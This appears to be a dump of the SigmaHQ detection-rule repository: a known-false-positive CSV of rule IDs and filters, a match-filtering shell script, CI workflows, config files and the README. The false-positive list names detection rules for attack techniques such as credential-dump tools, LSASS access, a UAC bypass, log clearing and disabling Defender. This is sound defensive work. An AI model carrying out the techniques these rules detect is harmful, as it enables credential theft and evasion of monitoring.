bef0bc5a-b9ae-425d-85c6-7b2d705980c6;Python Initiated Connection;151\.101\.64\.223
bef0bc5a-b9ae-425d-85c6-7b2d705980c6;Python Initiated Connection;146\.75\.117\.55
9711de76-5d4f-4c50-a94f-21e4e8f8384d;Installation of TeamViewer Desktop;TeamViewer_Desktop\.exe
9494479d-d994-40bf-a8b1-eea890237021;Scheduled Task Creation From Potential Suspicious Parent Location;.*
81325ce1-be01-4250-944f-b4789644556f;Suspicius Schtasks From Env Var Folder;TVInstallRestore
6ea3bf32-9680-422d-9f50-e90716b12a66;UAC Bypass Via Wsreset;EventType: DeleteKey
43f487f0-755f-4c2a-bce7-d6d2eec2fcf8;Suspicious Add Scheduled Task From User AppData Temp;TVInstallRestore
c187c075-bb3e-4c62-b4fa-beae0ffc211f;Deteled Rule in Windows Firewall with Advanced Security;Dropbox.*\\netsh\.exe
69aeb277-f15f-4d2d-b32a-55e883609563;Disabling Windows Event Auditing;Computer: .*
ac175779-025a-4f12-98b0-acdaeb77ea85;PowerShell Script Run in AppData;\\Evernote-
1f2b5353-573f-4880-8e33-7d04dcf97744;Sysmon Configuration Modification;Computer: evtx-PC
734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8;Remote PowerShell Session Host Process (WinRM);WIN-FPV0DSIC9O6
734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8;Remote PowerShell Session Host Process (WinRM);Computer: Agamemnon
a96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;Ninite\.exe
349d891d-fef0-4fe4-bc53-eee623a15969;Use Short Name Path in Command Line;Ninite\.exe
a96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;target\.exe
349d891d-fef0-4fe4-bc53-eee623a15969;Use Short Name Path in Command Line;target\.exe
a96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;unzip\.exe
349d891d-fef0-4fe4-bc53-eee623a15969;Use Short Name Path in Command Line;TeamViewer_\.exe
7a02e22e-b885-4404-b38b-1ddc7e65258a;Suspicious Schtasks Schedule Type;TeamViewer_\.exe
949f1ffb-6e85-4f00-ae1e-c3c5b190d605;Explorer Process Tree Break;Computer: Agamemnon
949f1ffb-6e85-4f00-ae1e-c3c5b190d605;Explorer Process Tree Break;Computer: WinDev2310Eval
fdbf0b9d-0182-4c43-893b-a1eaab92d085;Newly Registered Protocol Handler;.*
100ef69e-3327-481c-8e5c-6d80d9507556;System Eventlog Cleared;.*
52a85084-6989-40c3-8f32-091e12e17692;Suspicious Usage of CVE_2021_34484 or CVE 2022_21919;Computer: Agamemnon
573df571-a223-43bc-846e-3f98da481eca;Copy a File Downloaded From Internet;7z\.exe
37774c23-25a1-4adb-bb6d-8bb9fd59c0f8;Image Load of VSS Dll by Uncommon Executable;SetupFrontEnd\.exe
1a31b18a-f00c-4061-9900-f735b96c99fc;Remote Access Tool Services Have Been Installed - System;ServiceName: TeamViewer
c8b00925-926c-47e3-beea-298fd563728e;Remote Access Tool Services Have Been Installed - Security;ServiceName: TeamViewer
b69888d4-380c-45ce-9cf9-d9ce46e67821;Executable in ADS;msedge\.exe
b69888d4-380c-45ce-9cf9-d9ce46e67821;Executable in ADS;firefox\.exe
b69888d4-380c-45ce-9cf9-d9ce46e67821;Executable in ADS;7z\.exe
65236ec7-ace0-4f0c-82fd-737b04fd4dcb;EVTX Created In Uncommon Location;powershell\.exe
65236ec7-ace0-4f0c-82fd-737b04fd4dcb;EVTX Created In Uncommon Location;Computer: WIN-FPV0DSIC9O6.sigma.fr
a62b37e0-45d3-48d9-a517-90c1a1b0186b;Eventlog Cleared;Computer: .*
4eec988f-7bf0-49f1-8675-1e6a510b3a2a;Potential PendingFileRenameOperations Tamper;target\.exe
4eec988f-7bf0-49f1-8675-1e6a510b3a2a;Potential PendingFileRenameOperations Tamper;target\.tmp
48bfd177-7cf2-412b-ad77-baf923489e82;Image Load of VSS Dll by Uncommon Executable;SetupFrontEnd.exe
87911521-7098-470b-a459-9a57fc80bdfd;Sysmon Configuration Updated;.*
0eb46774-f1ab-4a74-8238-1155855f2263;Disable Windows Defender Functionalities Via Registry Keys;.*
e9d4ab66-a532-4ef7-a502-66a9e4a34f5d;NTLMv1 Logon Between Client and Server;.*
ccb5742c-c248-4982-8c5c-5571b9275ad3;Potential Suspicious Findstr.EXE Execution;httpd\.exe
9ae01559-cf7e-4f8e-8e14-4c290a1b4784;CredUI.DLL Load By Uncommon Process;Spotify\.exe
52182dfb-afb7-41db-b4bc-5336cb29b464;Suspicious File Download From File Sharing Websites;objects\.githubusercontent\.com
ce72ef99-22f1-43d4-8695-419dcb5d9330;Suspicious Windows Service Tampering;TeamViewer
dae8171c-5ec6-4396-b210-8466585b53e9;SCM Database Privileged Operation;0x277c6
3ce8e9a4-bc61-4c9b-8e69-d7e2492a8781;OpenSSH Server Listening On Socket;.*
b69888d4-380c-45ce-9cf9-d9ce46e67821;Hidden Executable In NTFS Alternate Data Stream;.*
4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76;Potentially Suspicious AccessMask Requested From LSASS;\\setup\.exe
d99b79d2-0a6f-4f46-ad8b-260b6e17f982;Security Eventlog Cleared;Computer: WinDevEval
b28e58e4-2a72-4fae-bdee-0fbe904db642;Windows Defender Real-time Protection Disabled;Computer: WinDev2310Eval
ef9dcfed-690c-4c5d-a9d1-482cd422225c;Browser Execution In Headless Mode;.*
65236ec7-ace0-4f0c-82fd-737b04fd4dcb;EVTX Created In Uncommon Location;Computer: (DESKTOP-6D0DBMB|WinDev2310Eval)
de587dce-915e-4218-aac4-835ca6af6f70;Potential Persistence Attempt Via Run Keys Using Reg.EXE;\\Discord\\
24357373-078f-44ed-9ac4-6d334a668a11;Direct Autorun Keys Modification;Discord\.exe
8fbf3271-1ef6-4e94-8210-03c2317947f6;Cred Dump Tools Dropped Files;Svchost\.exe
c7da8edc-49ae-45a2-9e61-9fd860e4e73d;PUA - Sysinternals Tools Execution - Registry;.*
dcff7e85-d01f-4eb5-badd-84e2e6be8294;Windows Default Domain GPO Modification via GPME;Computer: WIN-FPV0DSIC9O6.sigma.fr
416bc4a2-7217-4519-8dc7-c3271817f1d5;Suspicious Loading of Dbgcore/Dbghelp DLLs from Uncommon Location;procexp64\.exe
5a6b7c8d-9e0f-1a2b-3c4d-5e6f7a8b9c0d;Cmd Launched with Hidden Start Flags to Suspicious Targets;xampp
558eebe5-f2ba-4104-b339-36f7902bcc1a;File Creation Date Changed to Another Year;(\\target\.exe|thm\.wxl|\\AppData\\Local\\Temp\\)
5e993621-67d4-488a-b9ae-b420d08b96cb;Service Installation in Suspicious Folder;\\\\AppData\\\\Local\\\\Temp\\\\MBAMInstallerService\.exe
================================================
FILE: .github/workflows/matchgrep.sh
================================================
#!/bin/bash
infile=$1
fps=$2
if [[ -z ${infile} || -z ${fps} ]]; then
>&2 echo "usage: $0 [json-file] [FPs.csv]"
exit 1
fi
if [[ ! -f ${infile} || ! -r ${infile} ]]; then
>&2 echo "${infile} is not a valid, readable file"
exit 2
fi
if [[ ! -f ${fps} || ! -r ${fps} ]]; then
>&2 echo "${fps} is not a valid, readable file"
exit 2
fi
# Exclude all rules with level "low"
findings=$(grep -v '"RuleLevel":"low"' "${infile}")
{
read -r # Skip CSV header
while IFS=\; read -r id _name fpstring; do
findings=$(echo "${findings}" | grep -iEv "\"RuleId\":\"${id}\".*${fpstring}")
done
} < "${fps}"
if [[ -z ${findings} ]]; then
echo "No matches found."
else
>&2 echo "Found matches:"
echo "${findings}"
>&2 echo
>&2 echo "Match overview:"
echo "${findings}" | jq -c '. | {RuleId, RuleTitle, RuleLevel}' | sort | uniq -c | sort -nr >&2
>&2 echo
>&2 echo "You either need to tune your rule(s) for false positives or add a false positive filter to .github/workflows/known-FPs.csv"
exit 3
fi
================================================
FILE: .github/workflows/pr-labeler.yml
================================================
on:
pull_request_target:
types:
- opened
name: PR Labeler Workflow
jobs:
triage:
permissions:
contents: read
pull-requests: write
runs-on: ubuntu-latest
steps:
- uses: actions/labeler@v6
================================================
FILE: .github/workflows/ref-archiver.yml
================================================
name: "Reference Archiver"
on:
#push:
# branches:
# - "*"
schedule:
- cron: "30 1 1,15 * *" # At 01:30 on day-of-month 1 and 15.
# Allows you to run this workflow manually from the Actions tab
workflow_dispatch:
jobs:
archive:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v5
with:
submodules: true
- name: Set up Python 3.11
uses: actions/setup-python@v6
with:
python-version: 3.11
- name: Execute Reference Archiver
run: |
pip install PyYAML argparse requests
python tests/reference-archiver.py
- name: Create Pull Request
uses: peter-evans/create-pull-request@v5
with:
reviewers: nasbench, frack113, phantinuss
delete-branch: true
branch: 'create-pull-request/reference-archiver'
commit-message: 'chore: archive new rule references and update cache file'
title: 'Archive New Rule References'
body: |
### Summary of the Pull Request
This PR update the cache file used to save already archived references with newly archived results
### Changelog
chore: archive new rule references and update cache file
### Example Log Event
N/A
### Fixed Issues
N/A
### SigmaHQ Rule Creation Conventions
- If your PR adds new rules, please consider following and applying these [conventions](https://github.com/SigmaHQ/sigma-specification/blob/main/sigmahq/sigmahq_conventions.md)
================================================
FILE: .github/workflows/regression-tests.yml
================================================
name: Regression Tests
on: [push, pull_request, workflow_dispatch]
env:
EVTX_BASELINE_VERSION: v0.8.4
jobs:
true-positive-tests:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v5
- name: Set up Python
uses: actions/setup-python@v6
with:
python-version: '3.11'
- name: Install Python dependencies
run: |
python -m pip install --upgrade pip
pip install pyyaml
- name: Download evtx-sigma-checker
run: |
wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker
chmod +x evtx-sigma-checker
- name: Run regression tests
run: |
python tests/regression_tests_runner.py --rules-paths rules rules-emerging-threats rules-threat-hunting --evtx-checker ./evtx-sigma-checker --thor-config tests/thor.yml --ignore-validation
================================================
FILE: .github/workflows/release.yml
================================================
on:
push:
tags:
- 'r*'
name: Create Release
jobs:
build:
name: Create Release
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v5
with:
fetch-depth: 0
- name: Generate Changelog
run: |
prev_tag=$(git for-each-ref --sort=creatordate --format '%(refname:lstrip=2)' refs/tags | grep ^r | tail -2 | head -1)
curr_tag=$(git for-each-ref --sort=creatordate --format '%(refname:lstrip=2)' refs/tags | grep ^r | tail -1)
echo "Previous tag: ${prev_tag}"
echo "Current tag: ${curr_tag}"
if [[ $(git log --pretty=%B ${prev_tag}..${curr_tag} | grep -E '^\s*new: ' -c) -gt 0 ]]; then echo "### New Rules" > changes.txt; fi
git log --pretty=%B ${prev_tag}..${curr_tag} | grep -E '^\s*new: ' | sort -u | sed -e 's%^% - %' >> changes.txt
if [[ $(git log --pretty=%B ${prev_tag}..${curr_tag} | grep -E '^\s*update: ' -c) -gt 0 ]]; then echo "### Updated Rules" >> changes.txt; fi
git log --pretty=%B ${prev_tag}..${curr_tag} | grep -E '^\s*update: ' | sort -u | sed -e 's%^% - %' >> changes.txt
if [[ $(git log --pretty=%B ${prev_tag}..${curr_tag} | grep -E '^\s*remove: ' -c) -gt 0 ]]; then echo "### Removed / Deprecated Rules" >> changes.txt; fi
git log --pretty=%B ${prev_tag}..${curr_tag} | grep -E '^\s*remove: ' | sort -u | sed -e 's%^% - %' >> changes.txt
if [[ $(git log --pretty=%B ${prev_tag}..${curr_tag} | grep -E '^\s*fix: ' -c) -gt 0 ]]; then echo "### Fixed Rules" >> changes.txt; fi
git log --pretty=%B ${prev_tag}..${curr_tag} | grep -E '^\s*fix: ' | sort -u | sed -e 's%^% - %' >> changes.txt
git log --pretty=%B ${prev_tag}..${curr_tag} | grep -ioP 'Merge PR #\d+ from \K(@\S+)' | sort -u > authors_raw.txt
git log --pretty=%B ${prev_tag}..${curr_tag} | grep -oP "Co-authored-by: \K.*(?= <)" | sort -u | sed -e 's%^%@%' >> authors_raw.txt
git log --pretty=%B ${prev_tag}..${curr_tag} | grep -ioP "Thanks: \K.*?(?=$| for)" | sort -u >> authors_raw.txt
LC_ALL=en_US.UTF-8 sort -u authors_raw.txt | grep -v 'dependabot\[bot\]' > authors.txt
cat changes.txt >> changelog.txt
echo "" >> changelog.txt
echo "### Acknowledgement" >> changelog.txt
echo "Thanks to $(perl -pe 's%\n%, %' authors.txt | sed 's%, $%%') for their contribution to this release" >> changelog.txt
echo "" >> changelog.txt
echo "" >> changelog.txt
echo "### Which Sigma rule package should I use?" >> changelog.txt
echo "A detailed explanation can be found in the [Releases.md](Releases.md) file. If you are new to Sigma, we recommend starting with the \"Core\" ruleset." >> changelog.txt
echo "" >> changelog.txt
echo "The [latest release package on GitHub](https://docs.github.com/en/repositories/releasing-projects-on-github/linking-to-releases#linking-to-the-latest-release) can always be found [here](https://github.com/SigmaHQ/sigma/releases/latest)." >> changelog.txt
cat changelog.txt
- name: Build all release packages
run: |
python3 tests/sigma-package-release.py --min-status test --min-level high --rule-types generic --outfile sigma_core.zip
python3 tests/sigma-package-release.py --min-status test --min-level medium --rule-types generic --outfile sigma_core+.zip
python3 tests/sigma-package-release.py --min-status experimental --min-level medium --rule-types generic --outfile sigma_core++.zip
python3 tests/sigma-package-release.py --min-status experimental --min-level medium --rule-types et --outfile sigma_emerging_threats_addon.zip
python3 tests/sigma-package-release.py --min-status experimental --min-level medium --rule-types generic et --outfile sigma_all_rules.zip
- name: Create Release with Assets
id: create_release
uses: softprops/action-gh-release@v2
with:
tag_name: ${{ github.ref }}
name: Release ${{ github.ref_name }}
body_path: changelog.txt
token: ${{ secrets.GITHUB_TOKEN }}
draft: true
prerelease: false
files: |
sigma_core.zip
sigma_core+.zip
sigma_core++.zip
sigma_emerging_threats_addon.zip
sigma_all_rules.zip
================================================
FILE: .github/workflows/sigma-rule-deprecated.yml
================================================
name: "Create deprecated summary"
on:
#push:
# branches:
# - "*"
schedule:
- cron: "0 0 1 * *" # At 00:00 on day-of-month 1.
# Allows you to run this workflow manually from the Actions tab
workflow_dispatch:
jobs:
pull-master:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v5
with:
submodules: true
- name: Set up Python 3.11
uses: actions/setup-python@v6
with:
python-version: 3.11
- name: Execute deprecated rules script
run: |
pip install pySigma
python tests/deprecated_rules.py --format csv
python tests/deprecated_rules.py --format json
- name: Create Pull Request
uses: peter-evans/create-pull-request@v7
with:
reviewers: nasbench, frack113, phantinuss
delete-branch: true
commit-message: 'chore: update deprecated csv'
branch: 'create-pull-request/rule-deprecated'
title: 'Update deprecated.csv'
body: |
### Summary of the Pull Request
This PR updates the deprecated summary file `deprecated.csv` and `deprecated.json`
### Changelog
chore: update deprecated.csv and deprecated.json
### Example Log Event
N/A
### Fixed Issues
N/A
### SigmaHQ Rule Creation Conventions
- If your PR adds new rules, please consider following and applying these [conventions](https://github.com/SigmaHQ/sigma-specification/tree/main/sigmahq)
================================================
FILE: .github/workflows/sigma-rule-promoter.yml
================================================
#name: "Promote Experimental Rules To Test"
#
#on:
# #push:
# # branches:
# # - "*"
# schedule:
# - cron: "0 0 1 * *" # At 00:00 on day-of-month 1.
#
# # Allows you to run this workflow manually from the Actions tab
# workflow_dispatch:
#
#jobs:
# pull-master:
# runs-on: ubuntu-latest
# steps:
# - uses: actions/checkout@v5
# with:
# submodules: true
# - name: Set up Python 3.11
# uses: actions/setup-python@v6
# with:
# python-version: 3.11
# - name: Execute Rule Promoter Script
# run: |
# pip install pySigma
# python tests/promote_rules_status.py
# - name: Create Pull Request
# uses: peter-evans/create-pull-request@v7
# with:
# reviewers: nasbench, frack113, phantinuss
# delete-branch: true
# commit-message: 'chore: promote older rules status from `experimental` to `test`'
# branch: 'create-pull-request/rule-promotion'
# title: 'Promote Older Rules From `experimental` to `test`'
# body: |
# ### Summary of the Pull Request
#
# This PR promotes and upgrade the status of rules that haven't been changed for over 300 days from `experimental` to `test`
#
# ### Changelog
#
# chore: promote older rules status from `experimental` to `test`
#
# ### Example Log Event
#
# N/A
#
# ### Fixed Issues
#
# N/A
#
# ### SigmaHQ Rule Creation Conventions
#
# - If your PR adds new rules, please consider following and applying these [conventions](https://github.com/SigmaHQ/sigma-specification/blob/main/sigmahq/sigmahq_conventions.md)
#
================================================
FILE: .github/workflows/sigma-test.yml
================================================
# This workflow will install Python dependencies, run tests and lint with a single version of Python
# For more information see: https://help.github.com/actions/language-and-framework-guides/using-python-with-github-actions
name: Sigma Rule Tests
on: [push, pull_request, merge_group, workflow_dispatch]
jobs:
yamllint:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v5
- name: yaml-lint
uses: ibiqlik/action-yamllint@v3
with:
strict: true # fail on warnings as well
test-sigma-logsource:
runs-on: ubuntu-latest
needs: yamllint
steps:
- uses: actions/checkout@v5
with:
submodules: true
- name: Set up Python 3.11
uses: actions/setup-python@v6
with:
python-version: 3.11
- name: Test Sigma logsource
run: |
pip install PyYAML colorama
python tests/test_logsource.py
test-sigma-legacy:
runs-on: ubuntu-latest
needs: yamllint
steps:
- uses: actions/checkout@v5
with:
submodules: true
- name: Set up Python 3.11
uses: actions/setup-python@v6
with:
python-version: 3.11
- name: Test Sigma Rules
run: |
pip install PyYAML colorama
python tests/test_rules.py
sigma-check:
runs-on: ubuntu-latest
needs: yamllint
steps:
- uses: actions/checkout@v5
with:
submodules: true
- name: Set up Python 3.11
uses: actions/setup-python@v6
with:
python-version: 3.11
- name: Install dependencies
run: |
pip install pysigma
pip install sigma-cli
pip install pySigma-validators-sigmahq==0.20.*
- name: Test Sigma Rule Syntax
run: |
sigma check --fail-on-error --fail-on-issues --validation-config tests/sigma_cli_conf.yml rules*
duplicate-id-check:
runs-on: ubuntu-latest
needs: yamllint
steps:
- uses: actions/checkout@v5
with:
submodules: true
- name: Check for duplicate IDs
shell: /usr/bin/bash {0} # Use bash without -e to enable exit code manipulation
run: |
grep -rh "^id: " rules* deprecated unsupported | sort | uniq -c | grep -vE "^\s+1 id: "; exit $(( $? ^ 1 ))
================================================
FILE: .github/workflows/sigma-validation.yml
================================================
name: Validate Sigma rules
on: [push, pull_request, merge_group, workflow_dispatch]
jobs:
sigma-rules-validator:
runs-on: ubuntu-latest
steps:
- name: Validate Sigma rules
uses: SigmaHQ/sigma-rules-validator@v1
with:
paths: |-
./rules
./rules-compliance
./rules-dfir
./rules-emerging-threats
./rules-placeholder
./rules-threat-hunting
schemaFile: ${{ github.workspace }}/tests/validate-sigma-schema/sigma-schema.json
================================================
FILE: .github/workflows/update-heatmap.yml
================================================
name: Generate Updated ATT&CK Heatmap
on:
schedule:
- cron: "0 0 1 * *"
workflow_dispatch:
jobs:
generate-heatmap:
runs-on: ubuntu-latest
steps:
- name: Checkout Repository
uses: actions/checkout@v5
with:
submodules: true
- name: Install Sigma
run: pipx install sigma-cli
- name: Update Heatmap
run: sigma analyze attack count --min-score 0 --max-score 20 --min-color '#66b1ffff' --max-color '#ff66f4ff' ./other/sigma_attack_nav_coverage.json rule*
- name: Create Pull Request
uses: peter-evans/create-pull-request@v7
with:
reviewers: nasbench, frack113, phantinuss
delete-branch: true
commit-message: 'chore: update ATT&CK heatmap'
branch: 'create-pull-request/update-heatmap'
title: 'Update ATT&CK Heatmap Coverage'
body: |
### Summary of the Pull Request
This PR updates sigma_attack_nav_coverage.json to reflect the current rule coverage.
To generate a new SVG file, go to the [MITRE ATT&CK Navigator](https://mitre-attack.github.io/attack-navigator/#layerURL=https://raw.githubusercontent.com/SigmaHQ/sigma/master/other/sigma_attack_nav_coverage.json) and export a SVG via "Layer Controls" > "Export" (download icon) > "render layer to SVG".
### Changelog
chore: update ATT&CK heatmap
### Example Log Event
N/A
### Fixed Issues
N/A
### SigmaHQ Rule Creation Conventions
- If your PR adds new rules, please consider following and applying these [conventions](https://github.com/SigmaHQ/sigma-specification/blob/main/sigmahq/sigmahq_conventions.md)
================================================
FILE: .gitignore
================================================
# Byte-compiled / optimized / DLL files
__pycache__/
*.py[cod]
*$py.class
# C extensions
*.so
# Distribution / packaging
.Python
env/
build/
develop-eggs/
dist/
downloads/
eggs/
.eggs/
lib/
lib64/
parts/
sdist/
var/
*.egg-info/
.installed.cfg
*.egg
# PyInstaller
# Usually these files are written by a python script from a template
# before PyInstaller builds the exe, so as to inject date/other infos into it.
*.manifest
*.spec
# Installer logs
pip-log.txt
pip-delete-this-directory.txt
# Unit test / coverage reports
htmlcov/
.tox/
.coverage
.coverage.*
.cache
nosetests.xml
coverage.xml
*,cover
.hypothesis/
# Translations
*.mo
*.pot
# Django stuff:
*.log
local_settings.py
# Flask stuff:
instance/
.webassets-cache
# MacOS Finder
.DS_Store
# Scrapy stuff:
.scrapy
# Sphinx documentation
docs/_build/
# PyBuilder
target/
# IPython Notebook
.ipynb_checkpoints
# pyenv
.python-version
# celery beat schedule file
celerybeat-schedule
# dotenv
.env
# virtualenv
venv/
ENV/
# Spyder project settings
.spyderproject
# Rope project settings
.ropeproject
# vi(m)
*.swp
settings.json
# VisualStudio
.vs/
.vscode/launch.json
# sigma2attack
heatmap.json
================================================
FILE: .yamllint
================================================
# https://yamllint.readthedocs.io/en/latest/configuration.html
extends: default
ignore:
- .github/
- deprecated/
- other/godmode_sigma_rule.yml
- tests/
- unsupported/
rules:
comments:
require-starting-space: true
min-spaces-from-content: 1
comments-indentation: disable
document-start: {present: false}
empty-lines: {max: 2, max-start: 2, max-end: 2}
indentation: {spaces: 4, indent-sequences: whatever}
line-length: disable
new-line-at-end-of-file: enable
trailing-spaces: {}
================================================
FILE: CONTRIBUTING.md
================================================
# Contributing to Sigma 🧙♂️
First off, thank you for considering contributing to Sigma! Your help is invaluable in keeping this project up-to-date and useful for the community.
The following guidelines will help you understand how to contribute effectively.
## 📝 Reporting False Positives Or Proposing New Detection Rule Ideas 🔎
If you find a false positive or would like to propose a new detection rule idea but do not have the time to create one, please create a new issue on the [GitHub repository](https://github.com/SigmaHQ/sigma/issues/new/choose) by selecting one of the available templates.
## 🛠️ Submitting Pull Requests (PRs)
1. Fork the [SigmaHQ repository](https://github.com/SigmaHQ/sigma) and clone your fork to your local machine.
2. Create a new branch for your changes:
```bash
git checkout -b your-feature-branch
```
3. Make your changes, and test them:
```bash
python tests/test_logsource.py
python tests/test_rules.py
```
4. Once the test is successful, commit the changes to your branch:
```bash
git add .
git commit -m "Your commit message"
```
5. Push your changes to your fork:
```bash
git push origin your-feature-branch
```
6. Create a new Pull Request (PR) against the upstream repository:
* Go to the [Sigma repository](https://github.com/SigmaHQ/sigma) on GitHub
* Click the "New Pull Request" button
* Choose your fork and your feature branch
* Add a clear and descriptive title and a detailed description of your changes
* Submit the Pull Request
## 📚 Adding or Updating Detection Rules
To update or contribute a new rule please make sure to follow the guidelines in the [SigmaHQ conventions documents](https://github.com/SigmaHQ/sigma-specification/blob/main/sigmahq). Consider installing the [VsCode Sigma Extension](https://marketplace.visualstudio.com/items?itemName=humpalum.sigma) for auto completion and quality of life features.
Thank you for contributing to Sigma! 🧙♂️
================================================
FILE: LICENSE
================================================
# Licenses
The content of this repository is released under the following licenses:
- The Sigma specification (https://github.com/SigmaHQ/sigma-specification) and the Sigma logo are public domain
- The rules contained in the SigmaHQ repository (https://github.com/SigmaHQ) are released under the [Detection Rule License (DRL) 1.1](https://github.com/SigmaHQ/Detection-Rule-License)
================================================
FILE: README.md
================================================
# Sigma - Generic Signature Format for SIEM Systems
Welcome to the Sigma main rule repository. The place where detection engineers, threat hunters and all defensive security practitioners collaborate on detection rules. The repository offers more than 3000 detection rules of different type and aims to make reliable detections accessible to all at no cost.
Currently the repository offers three types of rules:
* [Generic Detection Rules](./rules/) - Are threat agnostic, their aim is to detect a behavior or an implementation of a technique or procedure that was, can or will be used by a potential threat actor.
* [Threat Hunting Rules](./rules-threat-hunting/) - Are broader in scope and are meant to give the analyst a starting point to hunt for potential suspicious or malicious activity
* [Emerging Threat Rules](./rules-emerging-threats/) - Are rules that cover specific threats, that are timely and relevant for certain periods of time. These threats include specific APT campaigns, exploitation of Zero-Day vulnerabilities, specific malware used during an attack,...etc.
* [Compliance Rules](./rules-compliance/) - Are rules that help you identify compliance violations based on well known security frameworks such as CIS Controls, NIST, ISO 27001,...etc.
* [Placeholder Rules](./rules-placeholder/) - Are rules that get their final meaning at conversion or usage time of the rule.
## Explore Sigma
To start exploring the Sigma ecosystem, please visit the official website [sigmahq.io](https://sigmahq.io)
### What is Sigma
Sigma is a generic and open signature format that allows you to describe relevant log events in a straightforward manner. The rule format is very flexible, easy to write and applicable to any type of log file.
The main purpose of this project is to provide a structured form in which researchers or analysts can describe their once developed detection methods and make them shareable with others.
Sigma is for log files what [Snort](https://www.snort.org/) is for network traffic and [YARA](https://github.com/VirusTotal/yara) is for files.
### Why Sigma
Today, everyone collects log data for analysis. People start working on their own, processing numerous white papers, blog posts and log analysis guidelines, extracting the necessary information and build their own searches and dashboard. Some of their searches and correlations are great and very useful but they lack a standardized format in which they can share their work with others.
Others provide excellent analyses, include IOCs and YARA rules to detect the malicious files and network connections, but have no way to describe a specific or generic detection method in log events. Sigma is meant to be an open standard in which such detection mechanisms can be defined, shared and collected in order to improve the detection capabilities for everyone.
### 🌟 Key Features
* A continuously growing list of detection and hunting rules, peer reviewed by a community of professional Detection Engineers.
* Vendor agnostic detection rules.
* Easily shareable across communities and reports
## 🏗️ Rule Creation
To start writing Sigma rules please check the following high level guide along with the sigma specification:
* [Rule Creation High‐Level Guide]([https://github.com/SigmaHQ/sigma/wiki/Rule-Creation-Guide](https://github.com/SigmaHQ/sigma/wiki/Rule-Creation-High%E2%80%90Level-Guide))
* [Sigma Specification](https://github.com/SigmaHQ/sigma-specification)
## 🔎 Contributing & Making PRs
Please refer to the [CONTRIBUTING](./CONTRIBUTING.md) guide for detailed instructions on how you can start contributing new rules.
## 📦 Rule Packages
You can download the latest rule packages from the [release page](https://github.com/SigmaHQ/sigma/releases/latest) and start leveraging Sigma rules today.
## 🧬 Rule Usage and Conversion
* You can start converting Sigma rules today using [Sigma CLI](https://github.com/SigmaHQ/sigma-cli) or [sigconverter.io](https://sigconverter.io) the GUI interface
* To integrate Sigma rules in your own toolchain or products use [pySigma](https://github.com/SigmaHQ/pySigma).
## 🚨 Reporting False Positives or New Rule Ideas
If you find a false positive or would like to propose a new detection rule idea but do not have the time to create one, please create a new issue on the [GitHub repository](https://github.com/SigmaHQ/sigma/issues/new/choose) by selecting one of the available templates.
## 📚 Resources & Further Reading
* [Hack.lu 2017 Sigma - Generic Signatures for Log Events by Thomas Patzke](https://www.youtube.com/watch?v=OheVuE9Ifhs)
* [MITRE ATT&CK® and Sigma Alerting SANS Webcast Recording](https://www.sans.org/webcasts/mitre-att-ck-sigma-alerting-110010 "MITRE ATT&CK® and Sigma Alerting")
* [Sigma - Generic Signatures for SIEM Systems by Florian Roth](https://www.slideshare.net/secret/gvgxeXoKblXRcA)
## Projects or Products that use or integrate Sigma rules
* [AlphaSOC](https://docs.alphasoc.com/detections_and_findings/sigma_community/) - Leverages Sigma rules to increase coverage across all supported log sources
* [alterix](https://github.com/mtnmunuklu/alterix) - Converts Sigma rules to the query language of CRYPTTECH's SIEM
* [AttackIQ](https://www.attackiq.com/2024/01/10/sigmaiq-attackiqs-latest-innovation-for-actionable-detections/) - Sigma Rules integrated in AttackIQ's platform, and [SigmAIQ](https://github.com/AttackIQ/SigmAIQ) for Sigma rule conversion and LLM apps
* [Atomic Threat Coverage](https://github.com/atc-project/atomic-threat-coverage) (Since December 2018)
* [AttackRuleMap - Mapping of Atomic Red Team tests and Sigma Rules](https://attackrulemap.com/)
* [Confluent Sigma](https://github.com/confluentinc/confluent-sigma) - Kafka Streams supported Sigma rules
* [Detection Studio](https://detection.studio/?ref=sigmahq_readme) - Convert Sigma rules to any supported SIEM.
* [IBM QRadar](https://community.ibm.com/community/user/security/blogs/gladys-koskas1/2023/08/02/qradar-natively-supports-sigma-for-rules-creation)
* [Impede Detection Platform](https://impede.ai/)
* [Joe Sandbox](https://www.joesecurity.org/blog/8225577975210857708)
* [LimaCharlie](https://limacharlie.io/)
* [MISP](http://www.misp-project.org/2017/03/26/MISP.2.4.70.released.html) (Since Version 2.4.70, March 2017)
* [Nextron's Aurora Agent](https://www.nextron-systems.com/aurora/)
* [Nextron's THOR Scanner](https://www.nextron-systems.com/thor/) - Scan with Sigma rules on endpoints
* [RANK VASA](https://globenewswire.com/news-release/2019/03/04/1745907/0/en/RANK-Software-to-Help-MSSPs-Scale-Cybersecurity-Offerings.html)
* [Saeros](https://github.com/Saeros-Security/Saeros)
* [Security Onion](https://docs.securityonion.net/en/latest/sigma.html)
* [Sekoia.io XDR](https://www.sekoia.io) - XDR supporting Sigma and Sigma Correlation rules languages
* [sigma2stix](https://github.com/muchdogesec/sigma2stix) - Converts the entire SigmaHQ Ruleset into STIX 2.1 Objects.
* A versioned archive of sigma2stix STIX 2.1 data is also available to [download here](https://github.com/muchdogesec/cti_knowledge_base_store/tree/main/sigma-rules).
* [SIΣGMA](https://github.com/3CORESec/SIEGMA) - SIEM consumable generator that utilizes Sigma for query conversion
* [SOC Prime](https://my.socprime.com/sigma/)
* [TA-Sigma-Searches](https://github.com/dstaulcu/TA-Sigma-Searches) (Splunk App)
* [TimeSketch](https://github.com/google/timesketch/commit/0c6c4b65a6c0f2051d074e87bbb2da2424fa6c35)
* [ypsilon](https://github.com/P4T12ICK/ypsilon) - Automated Use Case Testing
## 📜 Maintainers
* [Nasreddine Bencherchali (@nas_bench)](https://twitter.com/nas_bench)
* [Florian Roth (@cyb3rops)](https://twitter.com/cyb3rops)
* [Christian Burkard (@phantinuss)](https://twitter.com/phantinuss)
* [François Hubaut (@frack113)](https://twitter.com/frack113)
